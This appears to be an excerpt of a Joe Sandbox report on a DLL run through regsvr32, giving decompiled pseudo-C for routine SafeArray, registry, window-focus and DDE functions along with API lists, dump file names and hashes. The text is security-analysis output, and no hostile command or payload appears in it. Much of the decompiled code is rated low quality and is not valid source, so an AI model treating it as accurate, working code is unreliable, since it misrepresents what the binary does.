                                                                                                                • GlobalLock.KERNEL32 ref: 10037D55
                                                                                                                • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 10037D7F
                                                                                                                • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10037D9F
                                                                                                                • PostMessageA.USER32(?,000003E4,?,00000000), ref: 10037DAF
                                                                                                                  • Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1660452366-0
                                                                                                                • Opcode ID: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
                                                                                                                • Instruction ID: c983e17f3d8bc18d83424c477c4f136d14217cd03d05b8c9496dd5e1b9f8dfa4
                                                                                                                • Opcode Fuzzy Hash: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
                                                                                                                • Instruction Fuzzy Hash: 5E218C39900109AFDF05DBA0CD4AAEEBB79FF05351F148264F515AB2E1DB34AA44DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100232E6 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 19%
                                                                                                                			E100232E6(void* __eax, void* __ebx, void* __edi, void* __esi, char _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				short _v28;
				signed short _v32;
				char* _t25;
				short* _t27;
				void* _t34;
				short* _t35;
				signed short _t36;
				char _t37;
				signed int _t38;
				void* _t39;
				short* _t41;

				_t39 = __edi;
				_t34 = __ebx;
				_t41 = _a4;
				if( *_t41 != 0x2011) {
					L7:
					__imp__#9(_t41);
					_v12 = _v12 & 0x00000000;
					_v16 = _a8;
					_t25 =  &_v16;
					 *_t41 = 0x2011;
					__imp__#15(0x11, 1, _t25);
					__eflags = _t25;
					 *((intOrPtr*)(_t41 + 8)) = _t25;
					if(__eflags != 0) {
						goto L6;
					} else {
						E1000A035(_t34, _t35, _t39, _t41, __eflags);
						asm("int3");
						__eflags = _v28 - 0xb;
						_t27 = _t35;
						_t36 = _v32;
						if(_v28 != 0xb) {
							 *_t27 = 2;
						} else {
							_t36 =  ~_t36;
							 *_t27 = 0xb;
							asm("sbb ecx, ecx");
						}
						 *(_t27 + 8) = _t36;
						return _t27;
					}
				} else {
					__imp__#17( *((intOrPtr*)(_t41 + 8)));
					if(__eax != 1) {
						goto L7;
					} else {
						__imp__#20( *((intOrPtr*)(_t41 + 8)), 1,  &_v8);
						E1002303B( &_v8);
						__imp__#19( *((intOrPtr*)(_t41 + 8)), 1,  &_a4);
						E1002303B( &_a4);
						_t38 = _v8;
						_t25 = _a4 - _t38;
						if(_t25 < 0) {
							_t25 = 0;
						}
						_t37 = _a8;
						if(_t25 != _t37) {
							_v16 = _t37;
							_v12 = _t38;
							__imp__#40( *((intOrPtr*)(_t41 + 8)),  &_v16);
							_t25 = E1002303B( &_v16);
						}
						L6:
						return _t25;
					}
				}
			}

















                                                                                                                0x100232e6
                                                                                                                0x100232e6
                                                                                                                0x100232ed
                                                                                                                0x100232f5
                                                                                                                0x10023360
                                                                                                                0x10023361
                                                                                                                0x1002336a
                                                                                                                0x1002336e
                                                                                                                0x10023371
                                                                                                                0x10023379
                                                                                                                0x1002337e
                                                                                                                0x10023384
                                                                                                                0x10023386
                                                                                                                0x10023389
                                                                                                                0x00000000
                                                                                                                0x1002338b
                                                                                                                0x1002338b
                                                                                                                0x10023390
                                                                                                                0x10023391
                                                                                                                0x10023397
                                                                                                                0x10023399
                                                                                                                0x1002339e
                                                                                                                0x100233ac
                                                                                                                0x100233a0
                                                                                                                0x100233a0
                                                                                                                0x100233a3
                                                                                                                0x100233a8
                                                                                                                0x100233a8
                                                                                                                0x100233b1
                                                                                                                0x100233b5
                                                                                                                0x100233b5
                                                                                                                0x100232f7
                                                                                                                0x100232fa
                                                                                                                0x10023303
                                                                                                                0x00000000
                                                                                                                0x10023305
                                                                                                                0x1002330e
                                                                                                                0x10023315
                                                                                                                0x10023323
                                                                                                                0x1002332a
                                                                                                                0x10023332
                                                                                                                0x10023335
                                                                                                                0x10023337
                                                                                                                0x10023339
                                                                                                                0x10023339
                                                                                                                0x1002333b
                                                                                                                0x10023340
                                                                                                                0x10023349
                                                                                                                0x1002334c
                                                                                                                0x1002334f
                                                                                                                0x10023356
                                                                                                                0x10023356
                                                                                                                0x1002335b
                                                                                                                0x1002335d
                                                                                                                0x1002335d
                                                                                                                0x10023303

                                                                                                                APIs
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 100232FA
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 1002330E
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023323
                                                                                                                • SafeArrayRedim.OLEAUT32(?,?), ref: 1002334F
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10023361
                                                                                                                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 1002337E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Bound$ClearCreateRedimVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3151960920-0
                                                                                                                • Opcode ID: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
                                                                                                                • Instruction ID: c9470c1b6fd187e16e6dce7b7d25325f3df280aac33c778134fea66dad733e72
                                                                                                                • Opcode Fuzzy Hash: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
                                                                                                                • Instruction Fuzzy Hash: 8E114979900219AFEB10EFA4CD85ADE7BB9EF04340F90C4A5F945D6160D770EB908B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10023DDD Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10023DDD(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* __edi;
				void* __ebp;
				void* _t17;
				void* _t18;
				signed int _t20;
				void* _t29;
				void* _t36;

				_t16 =  &_v16;
				_t29 = __ecx;
				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
				_t17 = E1002303B(_t16);
				__imp__#17( *((intOrPtr*)(__ecx + 8)));
				if(_t17 != 1) {
					_t18 = E10034149(_a4, 0, 0xffffffff);
				} else {
					__imp__#20( *((intOrPtr*)(__ecx + 8)), 1,  &_v12, __esi, __ebx);
					_t20 =  &_v8;
					__imp__#19( *((intOrPtr*)(__ecx + 8)), 1, _t20);
					__imp__#18( *((intOrPtr*)(__ecx + 8)));
					_t24 = _t20 * (_v8 - _v12 + 1);
					_t34 = _a4;
					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
					_t18 = E1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
				}
				__imp__#24( *((intOrPtr*)(_t29 + 8)));
				return _t18;
			}













                                                                                                                0x10023de4
                                                                                                                0x10023de7
                                                                                                                0x10023ded
                                                                                                                0x10023df4
                                                                                                                0x10023dfc
                                                                                                                0x10023e05
                                                                                                                0x10023e64
                                                                                                                0x10023e07
                                                                                                                0x10023e12
                                                                                                                0x10023e18
                                                                                                                0x10023e21
                                                                                                                0x10023e31
                                                                                                                0x10023e39
                                                                                                                0x10023e3c
                                                                                                                0x10023e44
                                                                                                                0x10023e51
                                                                                                                0x10023e5a
                                                                                                                0x10023e6c
                                                                                                                0x10023e74

                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10023DED
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10023DFC
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10023E12
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023E21
                                                                                                                • SafeArrayGetElemsize.OLEAUT32(?), ref: 10023E31
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 10023E6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 719575404-0
                                                                                                                • Opcode ID: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
                                                                                                                • Instruction ID: cd6b60c9eaf2634be566483e00a3dd84f594c3239c15aba867d25aa922b9696a
                                                                                                                • Opcode Fuzzy Hash: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
                                                                                                                • Instruction Fuzzy Hash: BA11CE7A500019BFEF019BA4CD85DDDBB7DFB05350F008251F925E21E0CB31AEA08B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10026082 Relevance: 9.1, APIs: 6, Instructions: 57registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026082(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
				long _t21;
				void* _t28;

				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
				}
				if(_a8 != 0) {
					_t28 = E10025F4C(__ecx, _a4);
					if(_a12 != 0) {
						if(_t28 == 0) {
							L3:
							return 0;
						}
						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
						L10:
						RegCloseKey(_t28);
						return 0 | _t21 == 0x00000000;
					}
					if(_t28 == 0) {
						goto L3;
					}
					_t21 = RegDeleteValueA(_t28, _a8);
					goto L10;
				}
				_t28 = E10025EBB(__ecx);
				if(_t28 != 0) {
					_t21 = RegDeleteKeyA(_t28, _a4);
					goto L10;
				}
				goto L3;
			}





                                                                                                                0x1002608b
                                                                                                                0x00000000
                                                                                                                0x1002610c
                                                                                                                0x10026091
                                                                                                                0x100260ba
                                                                                                                0x100260bc
                                                                                                                0x100260d0
                                                                                                                0x1002609e
                                                                                                                0x00000000
                                                                                                                0x1002609e
                                                                                                                0x100260e8
                                                                                                                0x100260ee
                                                                                                                0x100260f1
                                                                                                                0x00000000
                                                                                                                0x100260fb
                                                                                                                0x100260c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100260c6
                                                                                                                0x00000000
                                                                                                                0x100260c6
                                                                                                                0x10026098
                                                                                                                0x1002609c
                                                                                                                0x100260a6
                                                                                                                0x00000000
                                                                                                                0x100260a6
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 100260A6
                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 100260C6
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 100260F1
                                                                                                                  • Part of subcall function 10025EBB: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
                                                                                                                  • Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
                                                                                                                  • Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
                                                                                                                  • Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F38
                                                                                                                  • Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F42
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002610C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1886894508-0
                                                                                                                • Opcode ID: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
                                                                                                                • Instruction ID: 88889b090a1c033fd2a8edf356c12eeefb5eb30433966703c4018381315e71d3
                                                                                                                • Opcode Fuzzy Hash: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
                                                                                                                • Instruction Fuzzy Hash: AD117032001629BBDF228F60EE84B9F3B66EF09791F518150FE1595061CB76DD61EBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10024316 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10024316(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				void* __edi;
				void* __ebp;
				void* _t17;
				void* _t18;
				signed int _t20;
				void* _t29;
				void* _t36;

				_t16 =  &_v16;
				_t29 = __ecx;
				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
				_t17 = E1002303B(_t16);
				__imp__#17( *((intOrPtr*)(__ecx + 8)));
				if(_t17 != 1) {
					_t18 = E10034149(_a4, 0, 0xffffffff);
				} else {
					__imp__#20( *((intOrPtr*)(__ecx + 8)), 0,  &_v12, __esi, __ebx);
					_t20 =  &_v8;
					__imp__#19( *((intOrPtr*)(__ecx + 8)), 0, _t20);
					__imp__#18( *((intOrPtr*)(__ecx + 8)));
					_t24 = _t20 * (_v8 - _v12 + 1);
					_t34 = _a4;
					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
					_t18 = E1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
				}
				__imp__#24( *((intOrPtr*)(_t29 + 8)));
				return _t18;
			}













                                                                                                                0x1002431d
                                                                                                                0x10024320
                                                                                                                0x10024326
                                                                                                                0x1002432d
                                                                                                                0x10024335
                                                                                                                0x1002433e
                                                                                                                0x1002439d
                                                                                                                0x10024340
                                                                                                                0x1002434b
                                                                                                                0x10024351
                                                                                                                0x1002435a
                                                                                                                0x1002436a
                                                                                                                0x10024372
                                                                                                                0x10024375
                                                                                                                0x1002437d
                                                                                                                0x1002438a
                                                                                                                0x10024393
                                                                                                                0x100243a5
                                                                                                                0x100243ad

                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10024326
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10024335
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 1002434B
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000000,?), ref: 1002435A
                                                                                                                • SafeArrayGetElemsize.OLEAUT32(?), ref: 1002436A
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 100243A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 719575404-0
                                                                                                                • Opcode ID: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
                                                                                                                • Instruction ID: 88db7224a8a0f5af019c71018b507da94ff957cc0a1cbedb2de26f508a1d3972
                                                                                                                • Opcode Fuzzy Hash: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
                                                                                                                • Instruction Fuzzy Hash: 84118E7A500529BFEB019BA4CE85EDDBB7DFB05350F104250F925E62A0CB31BE618B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021CE5 Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10021CE5(struct HWND__* _a4) {
				void* __ebx;
				void* __edi;
				struct HWND__* _t3;
				struct HWND__* _t6;
				void* _t7;
				void* _t10;
				struct HWND__* _t12;
				struct HWND__* _t15;

				_t3 = GetFocus();
				_t15 = _t3;
				if(_t15 != 0) {
					_t12 = _a4;
					if(_t15 == _t12) {
						L10:
						return _t3;
					}
					_push(_t7);
					if(E10021BD1(_t7, _t10, _t12, _t15, 3) != 0) {
						L5:
						if(_t12 == 0 || (GetWindowLongA(_t12, 0xfffffff0) & 0x40000000) == 0) {
							L8:
							_t3 = SendMessageA(_t15, 0x14f, 0, 0);
							goto L9;
						} else {
							_t6 = GetParent(_t12);
							_t3 = GetDesktopWindow();
							if(_t6 == _t3) {
								L9:
								goto L10;
							}
							goto L8;
						}
					}
					_t3 = GetParent(_t15);
					_t15 = _t3;
					if(_t15 == _t12) {
						goto L9;
					}
					_t3 = E10021BD1(GetParent, _t10, _t12, _t15, 2);
					if(_t3 == 0) {
						goto L9;
					}
					goto L5;
				}
				return _t3;
			}











                                                                                                                0x10021ce6
                                                                                                                0x10021cec
                                                                                                                0x10021cf0
                                                                                                                0x10021cf3
                                                                                                                0x10021cf9
                                                                                                                0x10021d57
                                                                                                                0x00000000
                                                                                                                0x10021d57
                                                                                                                0x10021cfb
                                                                                                                0x10021d0c
                                                                                                                0x10021d23
                                                                                                                0x10021d25
                                                                                                                0x10021d46
                                                                                                                0x10021d50
                                                                                                                0x00000000
                                                                                                                0x10021d37
                                                                                                                0x10021d38
                                                                                                                0x10021d3c
                                                                                                                0x10021d44
                                                                                                                0x10021d56
                                                                                                                0x00000000
                                                                                                                0x10021d56
                                                                                                                0x00000000
                                                                                                                0x10021d44
                                                                                                                0x10021d25
                                                                                                                0x10021d0f
                                                                                                                0x10021d11
                                                                                                                0x10021d15
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021d1a
                                                                                                                0x10021d21
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021d21
                                                                                                                0x10021d59

                                                                                                                APIs
                                                                                                                • GetFocus.USER32 ref: 10021CE6
                                                                                                                • GetParent.USER32(00000000), ref: 10021D0F
                                                                                                                  • Part of subcall function 10021BD1: GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
                                                                                                                  • Part of subcall function 10021BD1: GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
                                                                                                                • GetParent.USER32(?), ref: 10021D38
                                                                                                                • GetDesktopWindow.USER32 ref: 10021D3C
                                                                                                                • SendMessageA.USER32 ref: 10021D50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3020784601-0
                                                                                                                • Opcode ID: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
                                                                                                                • Instruction ID: 99b8e3808f96a69b3d538ace9a8887a7a6fbfffd02d8e37485124c6c5aeb4666
                                                                                                                • Opcode Fuzzy Hash: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
                                                                                                                • Instruction Fuzzy Hash: C4F0A43E940521BAE36297296D85FEE62DADFA7AD0FD20314F916A61A0DB34DC4140E8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10027494 Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10027494(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                                                                0x1002749b
                                                                                                                0x100274d6
                                                                                                                0x1002750c
                                                                                                                0x1002750c
                                                                                                                0x1002750e
                                                                                                                0x00000000
                                                                                                                0x1002750e
                                                                                                                0x100274f9
                                                                                                                0x100274fb
                                                                                                                0x10027503
                                                                                                                0x00000000
                                                                                                                0x10027509
                                                                                                                0x10027509
                                                                                                                0x00000000
                                                                                                                0x10027509
                                                                                                                0x10027503
                                                                                                                0x100274b4
                                                                                                                0x100274bc
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?), ref: 100274A0
                                                                                                                • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4
                                                                                                                • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
